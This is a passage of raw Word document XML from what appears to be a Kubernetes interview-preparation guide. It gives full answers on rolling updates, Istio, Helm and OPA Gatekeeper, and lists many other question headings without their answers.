        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t>When you update a Deployment:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Kubernetes creates new Pods with the updated version</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Old Pods are terminated gradually</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Traffic is shifted from old Pods to new Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Process continues until all old Pods are replaced</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Rolling update flow</w:t>
        <w:br/>
        <w:t>Old Pods → gradually replaced → New Pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Deployment strategy</w:t>
        <w:br/>
        <w:t>apiVersion: apps/v1</w:t>
        <w:br/>
        <w:t>kind: Deployment</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: my-app</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  replicas: 3</w:t>
        <w:br/>
        <w:t xml:space="preserve">  strategy:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    type: RollingUpdate</w:t>
        <w:br/>
        <w:t xml:space="preserve">    rollingUpdate:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      maxSurge: 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">      maxUnavailable: 1</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key parameters</w:t>
        <w:br/>
        <w:t>1. maxSurge</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Extra Pods allowed during update</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Example: 1 means 1 extra Pod can be created</w:t>
        <w:br/>
        <w:t>2. maxUnavailable</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Maximum Pods that can be unavailable during update</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Example: 1 means 1 Pod can be down</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example scenario</w:t>
        <w:br/>
        <w:t>You have:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * 3 replicas running (v1)</w:t>
        <w:br/>
        <w:t>You deploy v2:</w:t>
        <w:br/>
        <w:t>Step-by-step:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. 1 new Pod (v2) created</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. 1 old Pod (v1) terminated</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Repeat until all Pods are v2</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Zero downtime deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Safer production updates</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Easy rollback if something fails</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Gradual traffic shifting</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Rolling Update vs Recreate</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Rolling Update</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Recreate</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Downtime</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Deployment style</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Gradual</w:t>
        <w:br/>
        <w:tab/>
        <w:t>All at once</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Risk</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Production</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Simple apps/testing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Rollback support</w:t>
        <w:br/>
        <w:t>If new version fails:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes can roll back to previous ReplicaSet</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensures stability and quick recovery</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a restaurant staff upgrade:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Instead of replacing all chefs at once (risking service failure)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You replace one chef at a time while others continue working</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key behavior</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Managed by Deployment controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Works with ReplicaSets</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensures continuous availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports automated scaling during updates</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A rolling update in Kubernetes is a deployment strategy that incrementally replaces old Pods with new ones, ensuring zero downtime by gradually shifting traffic while maintaining application availability and allowing controlled scaling during the update process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q283. Explain rollback in Kubernetes.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q284. What is kubectl?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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q285. Describe resources</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q286. Explain kubeconfig.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q287. Explain Istio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Istio is a service mesh platform used to manage, secure, and observe microservices communication inside clusters like Kubernetes without changing application code.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Istio is a “traffic control system” for microservices that sits between services and controls all communication.</w:t>
        <w:br/>
        <w:t>It implements a full service mesh using sidecar proxies.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Istio is used</w:t>
        <w:br/>
        <w:t>In microservices environments:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Services communicate heavily with each other</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You need retries, security, routing, and monitoring everywhere</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Adding this logic inside each app is complex</w:t>
        <w:br/>
        <w:t>Istio solves this by:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Moving networking logic out of applications</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handling it at infrastructure level</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Istio architecture</w:t>
        <w:br/>
        <w:t>Istio has 2 main parts:</w:t>
        <w:br/>
        <w:t>1. Data Plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Made of Envoy proxies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Runs as sidecar container in each Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handles all inbound/outbound traffic</w:t>
        <w:br/>
        <w:t>2. Control Plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Called istiod</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Manages configuration and policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Distributes rules to Envoy proxies</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Traffic flow</w:t>
        <w:br/>
        <w:t>Service A → Envoy Proxy → Envoy Proxy → Service B</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features of Istio</w:t>
        <w:br/>
        <w:t>1. Traffic management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Load balancing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Request routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Traffic splitting (canary releases)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * A/B testing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fault injection (for testing failures)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Security (Zero Trust)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Mutual TLS (mTLS) between services</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automatic certificate management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Service identity-based authentication</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Observability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Metrics (latency, error rate, traffic volume)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Distributed tracing (request flow across services)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Logging and monitoring integration</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Istio works (simplified)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. You deploy Istio in the cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Sidecar proxies (Envoy) are injected into Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. All traffic goes through Envoy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Istiod configures traffic rules and security policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Envoy enforces them at runtime</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example use case</w:t>
        <w:br/>
        <w:t>Canary deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * 90% traffic → v1</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * 10% traffic → v2</w:t>
        <w:br/>
        <w:t>Istio handles this without changing app code.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Istio vs Kubernetes networking</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Istio</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Service routing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Basic</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Advanced</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>mTLS, identity-based</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Traffic control</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No fine control</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Full control</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Observability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Basic</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Deep tracing + metrics</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes = roads and basic traffic system</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Istio = smart traffic controller with surveillance, toll gates, and routing rules</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Components of Istio</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Envoy Proxy → handles traffic (data plane)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * istiod → control plane (config, security, discovery)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ingress/Egress Gateways → control external traffic</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>When to use Istio</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Large microservices systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Need advanced traffic control</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Strong security requirements (zero trust)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Observability at scale</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Downsides</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Complex setup</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Resource overhead (sidecars per pod)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Steeper learning curve</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Istio is an open-source service mesh platform that manages microservices communication in Kubernetes by deploying Envoy sidecar proxies for traffic control, security (mTLS), and observability, all centrally managed through the istiod control plane without requiring changes to application code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q288. What is Linkerd?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q289. Explain Envoy proxy.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q290. What is Helm?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Helm is a package manager for applications running on Kubernetes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Helm helps you install, configure, and manage Kubernetes applications using reusable packages called Charts.</w:t>
        <w:br/>
        <w:t>Think of it like:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * apt for Ubuntu</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * yum for Linux</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * npm for Node.js</w:t>
        <w:br/>
        <w:t>👉 But for Kubernetes apps</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Helm is used</w:t>
        <w:br/>
        <w:t>Without Helm:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * You write multiple YAML files (Deployment, Service, ConfigMap, etc.)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Manual configuration is error-prone</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Hard to manage versions and upgrades</w:t>
        <w:br/>
        <w:t>With Helm:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Everything is packaged into a single Chart</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Easy install, upgrade, rollback, and delete</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key concepts in Helm</w:t>
        <w:br/>
        <w:t>1. Chart</w:t>
        <w:br/>
        <w:t>A Helm package that contains:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes manifests</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Templates</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Default configuration values</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Release</w:t>
        <w:br/>
        <w:t>A running instance of a Chart in a cluster</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * My app Chart installed as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * release-1 in dev</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * release-2 in prod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Repository</w:t>
        <w:br/>
        <w:t>A place where Charts are stored and shared (like Docker Hub for images)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Helm works</w:t>
        <w:br/>
        <w:t xml:space="preserve">         1. You define a Helm Chart</w:t>
        <w:br/>
        <w:t xml:space="preserve">         2. You install it using Helm CLI</w:t>
        <w:br/>
        <w:t xml:space="preserve">         3. Helm renders Kubernetes YAML templates</w:t>
        <w:br/>
        <w:t xml:space="preserve">         4. Kubernetes API server deploys resources</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example workflow</w:t>
        <w:br/>
        <w:t>Install an app</w:t>
        <w:br/>
        <w:t>helm install my-app my-chart/</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Upgrade an app</w:t>
        <w:br/>
        <w:t>helm upgrade my-app my-chart/</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Rollback an app</w:t>
        <w:br/>
        <w:t>helm rollback my-app 1</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Helm chart structure</w:t>
        <w:br/>
        <w:t>my-chart/</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── Chart.yaml        # metadata</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── values.yaml       # default configs</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── templates/        # Kubernetes YAML templates</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example use case</w:t>
        <w:br/>
        <w:t>Instead of writing:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Deployment YAML</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Service YAML</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * ConfigMap YAML</w:t>
        <w:br/>
        <w:t>👉 You use one Helm Chart and just change values.yaml.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Helm is powerful</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Reusability (same chart for dev/prod)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Version control of deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Easy upgrades and rollbacks</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Simplifies complex Kubernetes apps</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Helm vs raw Kubernetes YAML</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Helm</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Raw YAML</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Reusability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Upgrades</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Easy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Manual</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Rollback</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Built-in</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Manual</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lower</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of Kubernetes like cooking:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * YAML files = individual raw recipes</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Helm = ready-made cookbook with customizable ingredients</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Simplifies deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Manages application lifecycle</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Supports templating and customization</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enables DevOps automation</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Helm is a package manager for Kubernetes that allows users to define, install, upgrade, and manage applications using reusable charts, enabling simplified deployment, version control, and lifecycle management of complex Kubernetes applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q291. Explain Helm charts.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q292. What are CRDs?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q293. Explain Operators.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q294. What is Kustomize?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q295. What is pod disruption budget?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q296. Explain resource requests.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q297. What are resource limits?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q298. Explain QoS classes.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q299. What is eviction?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q300. Explain node selectors.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q301. What is cordon and drain?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q302. Pods are recreated on other nodes by controllers</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q303. Explain cluster federation.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q304. What is kubeadm?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q305. Explain GKE.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q306. What is EKS?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q307. Explain AKS.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q308. What is container runtime?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q309. Explain containerd.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q310. What is CRI-O?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q311. Explain pod security standards.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q312. What is admission controller?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q313. Explain OPA Gatekeeper.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: OPA Gatekeeper is a policy enforcement framework for Kubernetes built on top of Open Policy Agent (OPA) that allows you to define and enforce custom governance and security policies for Kubernetes resources.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>OPA Gatekeeper lets you define “rules for your cluster” and automatically enforce them at admission time.</w:t>
        <w:br/>
        <w:t>It acts as a policy engine that blocks or audits non-compliant Kubernetes resources before they are created or updated.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why OPA Gatekeeper is used</w:t>
        <w:br/>
        <w:t>Kubernetes alone does not enforce advanced business or security rules like:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * “All Pods must have resource limits”</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * “No container should run as root”</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * “Only approved container registries are allowed”</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * “Every namespace must have labels”</w:t>
        <w:br/>
        <w:t>Gatekeeper solves this by:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Adding policy-as-code</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enforcing organization-wide rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Providing audit + enforcement capabilities</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t>OPA Gatekeeper integrates with the Kubernetes API via admission webhooks.</w:t>
        <w:br/>
        <w:t>kubectl → API Server → Gatekeeper Webhook → Allow / Deny → etcd</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key components</w:t>
        <w:br/>
        <w:t>1. ConstraintTemplate</w:t>
        <w:br/>
        <w:t>Defines the policy logic using Rego language (OPA language).</w:t>
        <w:br/>
        <w:t>Example: “deny privileged containers”</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Constraint</w:t>
        <w:br/>
        <w:t>Applies a policy to specific resources or namespaces.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Admission Webhook</w:t>
        <w:br/>
        <w:t>Intercepts API requests and evaluates policies.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example policy</w:t>
        <w:br/>
        <w:t>Step 1: ConstraintTemplate</w:t>
        <w:br/>
        <w:t>apiVersion: templates.gatekeeper.sh/v1</w:t>
        <w:br/>
        <w:t>kind: ConstraintTemplate</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: k8srequiredlimits</w:t>
        <w:br/>
